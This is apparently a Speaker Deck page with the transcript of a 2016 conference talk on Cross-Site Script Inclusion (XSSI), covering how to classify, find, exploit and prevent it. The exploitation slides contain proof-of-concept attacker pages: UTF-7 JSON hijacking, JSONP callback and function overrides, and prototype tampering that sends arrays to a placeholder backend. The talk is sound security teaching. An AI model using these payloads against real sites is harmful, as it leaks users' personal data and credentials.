Upgrade to Pro — share decks privately, control downloads, hide ads and more …

The Tale of a Fameless but Widespread Vulnerabi...

luh2
June 16, 2016
Technology
0
600

The Tale of a Fameless but Widespread Vulnerability

Two key components account for finding vulnerabilities of a certain class: awareness of the vulnerability and ease of finding the vulnerability. Cross-Site Script Inclusion (XSSI) vulnerabilities are not mentioned in the de facto standard for public attention - the OWASP Top 10. Additionally there is no public tool available to facilitate finding XSSI. The impact reaches from leaking personal information stored, circumvention of token-based protection to complete compromise of accounts. XSSI vulnerabilities are fairly wide spread and the lack of detection increases the risk of each XSSI. In this talk we are going to demonstrate how to find XSSI, exploit XSSI and also how to protect against XSSI. Watch the presentation of Security Fest: https://www.youtube.com/watch?v=5qA0CtS6cZ4. Link to Area41 Video (slightly different) will be posted as soon as the video is up.

luh2

June 16, 2016
Tweet

More Decks by luh2

See All by luh2
(Still) Exploiting TCP Timestamps
luh2
0
280

Other Decks in Technology

See All in Technology
インフラとバックエンドとフロントエンドをくまなく調べて遅いアプリを早くした件
tubone24
1
430
SSMRunbook作成の勘所_20241120
koichiotomo
1
110
Why App Signing Matters for Your Android Apps - Android Bangkok Conference 2024
akexorcist
0
120
スクラムチームを立ち上げる〜チーム開発で得られたもの・得られなかったもの〜
ohnoeight
2
350
社内で最大の技術的負債のリファクタリングに取り組んだお話し
kidooonn
1
550
オープンソースAIとは何か? --「オープンソースAIの定義 v1.0」詳細解説
shujisado
4
530
リンクアンドモチベーション ソフトウェアエンジニア向け紹介資料 / Introduction to Link and Motivation for Software Engineers
lmi
4
300k
いざ、BSC討伐の旅
nikinusu
2
780
サイバーセキュリティと認知バイアス:対策の隙を埋める心理学的アプローチ
shumei_ito
0
380
Python(PYNQ)がテーマのAMD主催のFPGAコンテストに参加してきた
iotengineer22
0
470
Can We Measure Developer Productivity?
ewolff
1
150
第1回 国土交通省 データコンペ参加者向け勉強会③ - Snowflake x estie編 -
estie
0
120

Featured

See All Featured
Git: the NoSQL Database
bkeepers
PRO
427
64k
The Myth of the Modular Monolith - Day 2 Keynote - Rails World 2024
eileencodes
16
2.1k
Into the Great Unknown - MozCon
thekraken
32
1.5k
Fantastic passwords and where to find them - at NoRuKo
philnash
50
2.9k
A better future with KSS
kneath
238
17k
The Invisible Side of Design
smashingmag
298
50k
Designing the Hi-DPI Web
ddemaree
280
34k
The Art of Delivering Value - GDevCon NA Keynote
reverentgeek
8
730
It's Worth the Effort
3n
183
27k
Facilitating Awesome Meetings
lara
50
6.1k
Design and Strategy: How to Deal with People Who Don’t "Get" Design
morganepeng
126
18k
Sharpening the Axe: The Primacy of Toolmaking
bcantrill
38
1.8k

Transcript

  1. Once upon a time…

  2. … but all was not good Same Origin Policy

  3. BUT Scripts (and JSONP) don‘t fall under the same strict

    SOP and can be included cross-domain, which is why we have

  4. XSSI - The Tale of a Fameless but Widespread Vulnerability

    Veit Hailperin @fenceposterror

  5. Wait what? RESEARCH CONSULTING AUDITING

  6. NOOO! XSSHowmany? www.malicious.net include script from www.your- bank.com leak data

  7. What About Ambient Authority? ▸ Works just the same as

    with CSRF  ▸ Ambient Authority Information is sent cross-site ▸ Leaked Information get‘s more interesting…

  8. Example Example

  9. The Script

  10. The Code

  11. The Leak

  12. You Said Fameless?

  13. We observe that a third of the surveyed sites utilize

    dynamic JavaScript. […] more than 80% of the sites are susceptible to attacks via remote script inclusion. - The Unexpected Dangers of Dynamic JavaScript, S. Lekies et al. “

  14. 1. Categorizing XSSI XXX

  15. Categorizing XSSI Dynamic JavaScript Non-Script Static JavaScript requiring Authentication Static

    Script / JSONP* * If the JSONP requires parameters, these need to be guessable 1 4 2 3

  16. 2. Finding XSSI

  17. ▸ Read the Code ▸ Grep for ▹ Public Keys

    ▹ Social Security Numbers ▹ Credit Card Numbers Finding XSSI Category 1

  18. Finding XSSI Category 2 and 3 Re-Request the JavaScript file

    without authentication and check if response is script Does the answer differ from the original? Re-Request the JavaScript file check if answer differs again Script requires authentication No Yes No Script not dynamic Yes Yes No Script probably generally dynamic Dynamic JS based on authentication

  19. Finding XSSI Category 4 – Non-Script / Browser Issues These

    issues are related to browser security Server Response [{'friend':'luke','email': '+ACcAfQBdADsAYQBsAGUAcgB0 ACgAJw BNAGEAeQAgAHQAaABlACAAZgBv AHIAYwBlACAAYgBlACAAdw BpAHQAaAAgAHkAbwB1ACcAKQA7 AFsAewAnAGoAb wBiACcAOgAnAGQAbwBuAGU-'}] Which translates to [{'friend':'luke','email': ''}];alert(‘May the force be with you’);[{'job':'done'}] Malicious Website <html> <body> <script src="http://site.tld/json- utf7.json" type="text/javascript" charset="UTF-7"></script> </body> </html> http://www.thespanner.co.uk/2011/05/30/json-hijacking/

  20. 2. Exploiting XSSI

  21. var privateKey = "-----BEGIN RSA PRIVATE KEY-----\ MIIEowIBAAKCAQEAvq7kdxjZq4naHB8jNTMrFsi SKhmf8rpsRWO0iS5EK/c+evvT\ [redacted]

    9abcosxptnnP286cyq7whYysfe5HqODAwZJp5SG FPKqilWE1MBur\ -----END RSA PRIVATE KEY-----", keys = [ { name: 'Key No 1', apiKey: '0c8aab23-2ab5-46c5-a0f2-e52ecf7d6ea8', privateKey: privateKey }, { name: 'Key No 2', apiKey: '1e4b8312-f767-43eb-a16b-d44d3e471198', privateKey: privateKey } ]; <!DOCTYPE html> <html> <head> <title>Global Variables</title> <script src="some.js"></script> </head> <body> <script> alert(JSON.stringify(keys[0])); </script> </body> </html> some.js Case: Global Variable

  22. Response angular.callbacks.7({"status":STATUS,"body":{"demographic s":{"email":......}}}) <script> var angular = function () {

    return 1; }; angular.callbacks = function () { return 1; }; angular.callbacks.7 = function (leaked) { alert(JSON.stringify(leaked)); }; </script> <script src="https://site.tld/p?jsonp=angular.callbacks.7" type="text/javascript"></script> Case: Function Override

  23. Response angular.callbacks._7({"status":STATUS,"body":{"demographics": {"email":......}}}) <script> gimmethatdata = function (leaked) { alert(JSON.stringify(leaked));

    }; </script> <script src="https://site.tld/p?jsonp=gimmethatdata" type="text/javascript"> </script> Case: Provide Callback

  24. (function(){ var arr = ["secret1", "secret2", "secret3"]; // intents to

    slice out first entry var x = arr.slice(1); ... })(); Array.prototype.slice = function(){ // leaks ["secret1", "secret2", "secret3"] sendToAttackerBackend(this); }; Case: Prototype Tampering Note: Example taken from S. Lekies paper

  25. 3. Preventing XSSI

  26. Preventing XSSI ▸ No sensitive data in JavaScript files or

    JSONP cbs. ▸ Correct Content-Type ▸ X-Content-Type-Options: nosniff ▸ Anti-Cross-Site Request Forgery Token ▸ SameSite Cookie Attribute (draft!) ▸ Spread the word ▸ Report them

  27. Links, References, Interesting Reads… • http://jeremiahgrossman.blogspot.ch/2006/01/advanced-web-attack- techniques-using.html • http://incompleteness.me/blog/2007/03/05/json-is-not-as-safe-as- people-think-it-is/

    • http://www.thespanner.co.uk/2011/05/30/json-hijacking/ • http://phrack.org/issues/69/12.html • https://www.mbsd.jp/Whitepaper/xssi.pdf • https://www.usenix.org/system/files/conference/usenixsecurity15/sec15- paper-lekies.pdf • http://sebastian-lekies.de/leak/ • http://miladbr.blogspot.ch/2013/03/cross-site-script-inclusion.html • http://www.scip.ch/en/?labs.20160414

  28. ▸ Passive Scanner Module ▸ Filters for JSONP and Scripts

    ▸ It’s in your Burp Store ▸ Currently only implemented for cookie Released DetectDynamicJS Burp Extension to make your life easier in finding XSSI

  29. Thanks for listening! Questions? @fenceposterror [email protected]